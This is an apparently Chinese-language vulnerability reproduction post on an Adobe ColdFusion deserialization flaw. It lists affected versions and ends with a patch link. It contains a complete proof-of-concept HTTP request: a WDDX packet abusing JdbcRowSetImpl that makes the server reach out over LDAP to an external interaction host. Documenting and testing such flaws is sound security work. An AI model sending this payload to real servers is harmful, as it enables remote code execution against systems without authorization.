0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,可能导致任意代码执行。

0x02影响版本

ColdFusion 2018 <= Update 16 

ColdFusion 2021 <= Update 6 

ColdFusion 2023 GA Release (2023.0.0.330468)

640 (22)_副本

0x03漏洞复现

1.访问漏洞环境

640 (23)_副本

2.对漏洞进行复现

Poc

POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 306
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>ldap%3a//ciqfss5blq626n2ml30gbaxsdjo54p9cq.oast.pro/rcrzfd</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>

复现请求

640 (21)_副本

3.nuclei工具测试(漏洞存在)

640 (24)_副本

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html